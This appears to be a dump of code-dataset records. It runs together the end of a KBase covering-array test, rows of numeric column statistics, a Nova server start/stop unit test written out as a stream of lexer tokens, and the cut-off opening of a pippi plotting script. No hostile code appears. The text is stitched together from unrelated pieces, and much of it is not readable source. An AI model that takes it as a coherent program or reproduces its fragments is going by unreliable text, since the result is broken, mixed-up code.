'output_json_check':1,
'output_media_check':0})
arrayValid = int(subprocess.check_output(['/kb/module/./checkpairs','/kb/module/anneal.out']))
self.assertEqual(arrayValid,0,"Produced incorrect coverage array")
#identify consistent member of tool output that indicates success
#self.assertEqual(ret, "OK")
def testManualandMediaInputExclusive(self):
testMedia = {"__VERSION__":1,"id":"kb|media.664","isDefined":0,"isMinimal":0,"mediacompounds":[{"compound_ref":"kbase/default/compounds/id/cpd00205",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00242","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00048","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00009",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00007","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00013","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00971",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00067","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00001","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00036",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00100","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00023","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00027",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd10516","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00058","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00099",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00137","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00063","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00254",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00030","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00034","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00149",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00244","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd10515","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd11574",
"concentration":0.001,"maxFlux":100,"minFlux":-100}],"name":"7H9","source_id":"7H9","type":"unspecified"}
#weka has the object saved in the setupclass method
mediaObject = self.getWsClient().save_objects({'workspace': self.getWsName(),'objects': [{'name':'Mediain',
'type':'KBaseBiochem.Media',
'data':testMedia }]
})[0]
ret = self.serviceImpl.run_Coveringarray(self.ctx, {'workspace_name': self.wsName,'option_0':"2",
'container_object': [{"option_1":"cpd00007", "option_2":["100","0"]},
{"option_1":"cpd00009", "option_2":["100","0"],'output_media':'matrixout'}
],
'input_media':mediaObject[0],'evaluation_options':'isolate_media','output_media':'matrixout',
'output_json_check':1,
'output_media_check':1})
arrayValid = int(subprocess.check_output(['/kb/module/./checkpairs','/kb/module/anneal.out']))
self.assertEqual(arrayValid,0,"Produced incorrect coverage array")
def testManualandMediaInputInclusive(self):
testMedia = {"__VERSION__":1,"id":"kb|media.664","isDefined":0,"isMinimal":0,"mediacompounds":[{"compound_ref":"kbase/default/compounds/id/cpd00205",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00242","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00048","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00009",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00007","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00013","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00971",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00067","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00001","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00036",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00100","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00023","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00027",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd10516","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00058","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00099",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00137","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00063","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00254",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00030","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00034","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00149",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00244","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd10515","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd11574",
"concentration":0.001,"maxFlux":100,"minFlux":-100}],"name":"7H9","source_id":"7H9","type":"unspecified"}
#weka has the object saved in the setupclass method
mediaObject = self.getWsClient().save_objects({'workspace': self.getWsName(),'objects': [{'name':'Mediain',
'type':'KBaseBiochem.Media',
'data':testMedia }]
})[0]
ret = self.serviceImpl.run_Coveringarray(self.ctx, {'workspace_name': self.wsName,'option_0':"2",
'container_object': [{"option_1":"cpd00009", "option_2":["90","80"]},
{"option_1":"cpd00007", "option_2":["70","60"],'output_media':'matrixout'}
],
'input_media':mediaObject[0], 'evaluation_options':'overwrite_media','output_media':'mediaout',
'output_media_check':1,
'output_json_check':1})
arrayValid = int(subprocess.check_output(['/kb/module/./checkpairs','/kb/module/anneal.out']))
self.assertEqual(arrayValid,0,"Produced incorrect coverage array")
#sef.assertEqual(ret, "OK")
| 88.589744 | 193 | 0.614568 | 2,221 | 20,730 | 5.622692 | 0.10896 | 0.088085 | 0.128123 | 0.184177 | 0.825432 | 0.816144 | 0.805653 | 0.805653 | 0.805653 | 0.796204 | 0 | 0.098923 | 0.202701 | 20,730 | 233 | 194 | 88.969957 | 0.656643 | 0.03864 | 0 | 0.6 | 0 | 0 | 0.474707 | 0.186316 | 0 | 0 | 0 | 0 | 0.021622 | 1 | 0.054054 | false | 0 | 0.048649 | 0.016216 | 0.135135 | 0.005405 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ff3afed53bb7d3063c02272328b7de9d9b95b4f6 | 16,344 | py | Python | nova/tests/unit/api/openstack/compute/test_server_start_stop.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/api/openstack/compute/test_server_start_stop.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/api/openstack/compute/test_server_start_stop.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | 2 | 2017-07-20T17:31:34.000Z | 2020-07-24T02:42:19.000Z | begin_unit
comment|'# Copyright (c) 2012 Midokura Japan K.K.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'from'
name|'mox3'
name|'import'
name|'mox'
newline|'\n'
name|'import'
name|'six'
newline|'\n'
name|'import'
name|'webob'
newline|'\n'
nl|'\n'
name|'from'
name|'oslo_policy'
name|'import'
name|'policy'
name|'as'
name|'oslo_policy'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
op|'.'
name|'api'
op|'.'
name|'openstack'
op|'.'
name|'compute'
name|'import'
name|'extension_info'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'api'
op|'.'
name|'openstack'
op|'.'
name|'compute'
name|'import'
name|'servers'
name|'as'
name|'server_v21'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'compute'
name|'import'
name|'api'
name|'as'
name|'compute_api'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'policy'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'api'
op|'.'
name|'openstack'
name|'import'
name|'fakes'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
name|'import'
name|'uuidsentinel'
name|'as'
name|'uuids'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|fake_instance_get
name|'def'
name|'fake_instance_get'
op|'('
name|'context'
op|','
name|'instance_id'
op|','
nl|'\n'
name|'columns_to_join'
op|'='
name|'None'
op|','
name|'use_slave'
op|'='
name|'False'
op|')'
op|':'
newline|'\n'
indent|' '
name|'result'
op|'='
name|'fakes'
op|'.'
name|'stub_instance'
op|'('
name|'id'
op|'='
number|'1'
op|','
name|'uuid'
op|'='
name|'instance_id'
op|')'
newline|'\n'
name|'result'
op|'['
string|"'created_at'"
op|']'
op|'='
name|'None'
newline|'\n'
name|'result'
op|'['
string|"'deleted_at'"
op|']'
op|'='
name|'None'
newline|'\n'
name|'result'
op|'['
string|"'updated_at'"
op|']'
op|'='
name|'None'
newline|'\n'
name|'result'
op|'['
string|"'deleted'"
op|']'
op|'='
number|'0'
newline|'\n'
name|'result'
op|'['
string|"'info_cache'"
op|']'
op|'='
op|'{'
string|"'network_info'"
op|':'
string|"'[]'"
op|','
nl|'\n'
string|"'instance_uuid'"
op|':'
name|'result'
op|'['
string|"'uuid'"
op|']'
op|'}'
newline|'\n'
name|'return'
name|'result'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|fake_start_stop_not_ready
dedent|''
name|'def'
name|'fake_start_stop_not_ready'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceNotReady'
op|'('
name|'instance_id'
op|'='
name|'instance'
op|'['
string|'"uuid"'
op|']'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|fake_start_stop_locked_server
dedent|''
name|'def'
name|'fake_start_stop_locked_server'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceIsLocked'
op|'('
name|'instance_uuid'
op|'='
name|'instance'
op|'['
string|"'uuid'"
op|']'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|fake_start_stop_invalid_state
dedent|''
name|'def'
name|'fake_start_stop_invalid_state'
op|'('
name|'self'
op|','
name|'context'
op|','
name|'instance'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceIsLocked'
op|'('
name|'instance_uuid'
op|'='
name|'instance'
op|'['
string|"'uuid'"
op|']'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|ServerStartStopTestV21
dedent|''
name|'class'
name|'ServerStartStopTestV21'
op|'('
name|'test'
op|'.'
name|'TestCase'
op|')'
op|':'
newline|'\n'
DECL|variable|start_policy
indent|' '
name|'start_policy'
op|'='
string|'"os_compute_api:servers:start"'
newline|'\n'
DECL|variable|stop_policy
name|'stop_policy'
op|'='
string|'"os_compute_api:servers:stop"'
newline|'\n'
nl|'\n'
DECL|member|setUp
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'ServerStartStopTestV21'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'_setup_controller'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'req'
op|'='
name|'fakes'
op|'.'
name|'HTTPRequest'
op|'.'
name|'blank'
op|'('
string|"''"
op|')'
newline|'\n'
nl|'\n'
DECL|member|_setup_controller
dedent|''
name|'def'
name|'_setup_controller'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ext_info'
op|'='
name|'extension_info'
op|'.'
name|'LoadedExtensionInfo'
op|'('
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'='
name|'server_v21'
op|'.'
name|'ServersController'
op|'('
nl|'\n'
name|'extension_info'
op|'='
name|'ext_info'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_start
dedent|''
name|'def'
name|'test_start'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'start'"
op|')'
newline|'\n'
name|'compute_api'
op|'.'
name|'API'
op|'.'
name|'start'
op|'('
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_start_server'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_start_policy_failed
dedent|''
name|'def'
name|'test_start_policy_failed'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'rules'
op|'='
op|'{'
nl|'\n'
name|'self'
op|'.'
name|'start_policy'
op|':'
string|'"project_id:non_fake"'
nl|'\n'
op|'}'
newline|'\n'
name|'policy'
op|'.'
name|'set_rules'
op|'('
name|'oslo_policy'
op|'.'
name|'Rules'
op|'.'
name|'from_dict'
op|'('
name|'rules'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'exc'
op|'='
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'PolicyNotAuthorized'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_start_server'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
name|'self'
op|'.'
name|'start_policy'
op|','
name|'exc'
op|'.'
name|'format_message'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_start_not_ready
dedent|''
name|'def'
name|'test_start_not_ready'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'start'"
op|','
name|'fake_start_stop_not_ready'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_start_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_start_locked_server
dedent|''
name|'def'
name|'test_start_locked_server'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'start'"
op|','
name|'fake_start_stop_locked_server'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_start_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_start_invalid_state
dedent|''
name|'def'
name|'test_start_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'start'"
op|','
name|'fake_start_stop_invalid_state'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'ex'
op|'='
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_start_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'is locked'"
op|','
name|'six'
op|'.'
name|'text_type'
op|'('
name|'ex'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_stop
dedent|''
name|'def'
name|'test_stop'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'StubOutWithMock'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'stop'"
op|')'
newline|'\n'
name|'compute_api'
op|'.'
name|'API'
op|'.'
name|'stop'
op|'('
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|','
name|'mox'
op|'.'
name|'IgnoreArg'
op|'('
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'mox'
op|'.'
name|'ReplayAll'
op|'('
op|')'
newline|'\n'
nl|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'stop'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_stop_server'
op|'('
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_stop_policy_failed
dedent|''
name|'def'
name|'test_stop_policy_failed'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'rules'
op|'='
op|'{'
nl|'\n'
name|'self'
op|'.'
name|'stop_policy'
op|':'
string|'"project_id:non_fake"'
nl|'\n'
op|'}'
newline|'\n'
name|'policy'
op|'.'
name|'set_rules'
op|'('
name|'oslo_policy'
op|'.'
name|'Rules'
op|'.'
name|'from_dict'
op|'('
name|'rules'
op|')'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'stop'
op|'='
string|'""'
op|')'
newline|'\n'
name|'exc'
op|'='
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'PolicyNotAuthorized'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_stop_server'
op|','
nl|'\n'
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
name|'self'
op|'.'
name|'stop_policy'
op|','
name|'exc'
op|'.'
name|'format_message'
op|'('
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_stop_not_ready
dedent|''
name|'def'
name|'test_stop_not_ready'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'stop'"
op|','
name|'fake_start_stop_not_ready'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'stop'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_stop_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_stop_locked_server
dedent|''
name|'def'
name|'test_stop_locked_server'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'stop'"
op|','
name|'fake_start_stop_locked_server'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'stop'
op|'='
string|'""'
op|')'
newline|'\n'
name|'ex'
op|'='
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_stop_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertIn'
op|'('
string|"'is locked'"
op|','
name|'six'
op|'.'
name|'text_type'
op|'('
name|'ex'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_stop_invalid_state
dedent|''
name|'def'
name|'test_stop_invalid_state'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'stub_out'
op|'('
string|"'nova.db.instance_get_by_uuid'"
op|','
name|'fake_instance_get'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'stubs'
op|'.'
name|'Set'
op|'('
name|'compute_api'
op|'.'
name|'API'
op|','
string|"'stop'"
op|','
name|'fake_start_stop_invalid_state'
op|')'
newline|'\n'
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPConflict'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_stop_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_start_with_bogus_id
dedent|''
name|'def'
name|'test_start_with_bogus_id'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'start'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPNotFound'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_start_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_stop_with_bogus_id
dedent|''
name|'def'
name|'test_stop_with_bogus_id'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'body'
op|'='
name|'dict'
op|'('
name|'stop'
op|'='
string|'""'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'webob'
op|'.'
name|'exc'
op|'.'
name|'HTTPNotFound'
op|','
nl|'\n'
name|'self'
op|'.'
name|'controller'
op|'.'
name|'_stop_server'
op|','
name|'self'
op|'.'
name|'req'
op|','
name|'uuids'
op|'.'
name|'instance'
op|','
name|'body'
op|')'
newline|'\n'
dedent|''
dedent|''
endmarker|''
end_unit
| 12.325792 | 88 | 0.60952 | 2,453 | 16,344 | 3.949857 | 0.071341 | 0.201878 | 0.085664 | 0.098256 | 0.853339 | 0.830839 | 0.799257 | 0.735576 | 0.71865 | 0.686139 | 0 | 0.001422 | 0.096366 | 16,344 | 1,325 | 89 | 12.335094 | 0.654614 | 0 | 0 | 0.940377 | 0 | 0 | 0.358725 | 0.053965 | 0 | 0 | 0 | 0 | 0.010566 | 0 | null | null | 0 | 0.009057 | null | null | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ff3b1827b738fe5764e1717591fd89a6f63efa9f | 86,263 | py | Python | pippi_script.py | patscott/pippi | 4818fa11abe6c9b0b62f6e31036ff975eb120bca | [
"Unlicense"
] | 10 | 2015-09-08T15:38:20.000Z | 2019-04-29T12:46:37.000Z | pippi_script.py | patscott/pippi | 4818fa11abe6c9b0b62f6e31036ff975eb120bca | [
"Unlicense"
] | 7 | 2016-11-18T13:28:24.000Z | 2021-07-01T01:43:23.000Z | pippi_script.py | patscott/pippi | 4818fa11abe6c9b0b62f6e31036ff975eb120bca | [
"Unlicense"
] | 3 | 2019-07-18T04:06:47.000Z | 2021-08-01T10:43:05.000Z |
#############################################################
# pippi: parse it, plot it
# ------------------------
# Program for creating plotting scripts for pippi.
#
# Author: Pat Scott (patscott@physics.mcgill.ca)
# Originally developed: March 2012
#############################################################
left_margin = 0.16
right_margin = 0.03
top_margin = 0.05
bottom_margin = 0.16
plot_scale = 1.1
import subprocess
import os
from pippi_utils import *
from pippi_read import *
#Define pip file entries required from parsing
parsedir = dataObject('parse_dir',safe_string)
# Define script-specific pip file entries
scriptdir = dataObject('script_dir',safe_string)
doComparison = dataObject('plot_comparison',boolean)
